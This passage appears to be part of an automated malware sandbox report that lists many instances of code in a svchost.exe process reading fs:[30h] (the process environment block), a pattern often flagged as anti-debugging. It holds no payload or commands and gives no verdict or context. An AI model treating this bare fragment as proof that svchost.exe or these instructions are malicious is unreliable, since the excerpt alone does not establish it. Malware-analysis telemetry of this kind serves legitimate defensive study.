            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h]1_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]1_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]1_2_03CD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h]1_2_03D0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]1_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]1_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]1_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h]1_2_03D062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h]1_2_03D0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]1_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]1_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]1_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]1_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]1_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]1_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]1_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]1_2_03C280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
